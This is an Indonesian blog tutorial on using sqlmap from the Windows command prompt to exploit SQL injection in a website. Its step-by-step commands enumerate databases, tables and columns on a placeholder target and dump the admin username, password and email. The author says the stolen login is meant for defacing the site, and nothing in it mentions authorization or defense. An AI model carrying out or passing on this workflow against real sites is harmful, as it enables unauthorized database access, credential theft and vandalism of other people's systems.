>

Tutorial Sqlmap Di Windows Menggunakan CMD

, ,

Tutorial Sqlmap Di Windows Menggunakan CMD


Hai guys semua :).Kali ini saya akan share tutorial melakukan Sqlmap Di Windows menggunakan CMD.Jadi ini buat pengguna Windows ya guys :).Sebenernya Linux juga bisa vroh tapi OS saya bukan Linux bray.

Ok Sebelumnya biar saya jelaskan dulu guys 
Sqlmap adalah tools opensource yang mendeteksi dan  melakukan exploit pada bug SQL INJECTION seorang attacker dapat mengambil alih dan memanipulasi sebuah database di dalam sebuah server

Biar diperjelas saja gan Apa sih itu SQL Injection dan Database.

  • Sql Injection adalah teknik hacking dimana attacker dapat menyisipkan perintah-perintah SQL melalui URL untuk eksekusi oleh database bug atau vulnerability ini dapat terjadi karena kelailan seorang progammer dalam mebangun progam web seperti tidak difilter variabelnya dalam web tersebut.
  • Database adalah kumpulan informasi yang disimpan di dalam komputer atau webserver secara sistematik yang berguna untuk memperoleh informasi dari basis data tersebut. 
Nah penjelasannya sudah lanjut sekarang tutorialnya guys.
1.Siapkan dan install terlebih dahulu phyton(pas proses penginstallan klik nex" saja)
2.Install file sqlmap nya di http://sqlmap.org/ download yang file zipnya
3.Kalo sudah diinstal sqlmapnya biar gampang ekstra di dekstop gan :) jangan di folder lain taroh didekstop saja biar mempermudah.Jangan lupa rename foldernya menjadi sqlmap.
4.sekarang buka cmd kalian ketikan command cd desktop  klik enter.


5.setelah itu ketikan  lagi cd sqlmap

 6.Nah sampai disini kita coba  sqlmap nya work atau tidak..
7.Dengan cara kita test melakukan penyerangan commandnya: sqlmap.py -u https//targetkamu.com/index.php?id= --dbs  (yang urlnya itu targetnya gan silahkan disesuaikan kalo gak work tambahin tanda petik ' dibelakang url)

 8.Lalu klik  enter gan.Tunggu sesaat jika work akan seperti ini sebelumnya pastikan  web  yang di sql vuln
ScreenShoots:
itu gw cuman test doang  url nya juga ngawur bro wkwkwk :)

9.Nah kalo vuln biasanya bakal keluar database apalah kek pasword atau id nya yang berguna buat di anu. :)

saya umpamakan sqlmap berhasil mendapatkan 2 nama database yaitu

  • information_schema
  • my_db

langkah selanjutnya yang akan kita lakukan adalah mengintip table yang ada di dalam database tersebut, tapi database yang mana ? hmmmm sepertinya saya lebih tertarik sama database yang bernama "my_db".!! loh kenapa ? mungkin feeling aja :-p

sekarang kita ketikkan lagi perintah ini

 ./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db --tables
karena saya capek mengetikkan contoh untuk linux dan windows, jadi saya akan mengetikkan 1 contoh saja, bagi pengguna linux harus diawali dengan tanda "./" sebelum comand sedangkan di windows tidak di pakai alias langsung aja "sqlmap.py -u bla...bla...bla.."

ok next step, setelah kita tunggu beberapa saat ternyata sqlmap menemukan table yang ada di dalam database "my_db". saya umpamakan table-table tersebut adalah sebagai berikut.

  • admin
  • members
  • item 

Nah bagi yang ingin  melakukan deface,buka isi table admin tersebut ketikan command

sqlmap.py -u https://www.target/index.php?id=7 -D mu db -T admin --columns

klik enter tunggu beberapa tahun,dan kita mendapati "collumn" dari table admin tadi saya umpamakan lalu enter dan tunggu beberapa saat, dan kita mendapati "column" dari "table" admin tadi. saya umpamakan nama columnya

ID
username
password
email_address
country
disini saya akan mengambil informasi dari dalam "column" admin tadi, yang ingin saya intip adalah "username","password",dan "email_address". maka saya akan kembali mengetikkan perintah

 ./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin -C username,password,email_address --dump
 dan hasilnya saya mendapati sebagai berikut :


admin:123456:admin@target.com
 ini artinya :

admin = username
123456 = password
admin@target.com = email_address
nah sekarang saya tinggal mencari admin login dan siap melakukan deface . :-)

.
Sekian  tutorialnya guys kalo masih ada pertanyaan komen saja :).Maaf jika ada salah kata dan maaf karena saya masih noob sangad , juga maaf kalau screenshotnya jelek gan wkwkwk.

~Mr.Yka37
at
Labels: , ,

1 comment:

Subscribe to: Post Comments (Atom)

Pages

Created By SoraTemplates | Distributed By Gooyaabi Templates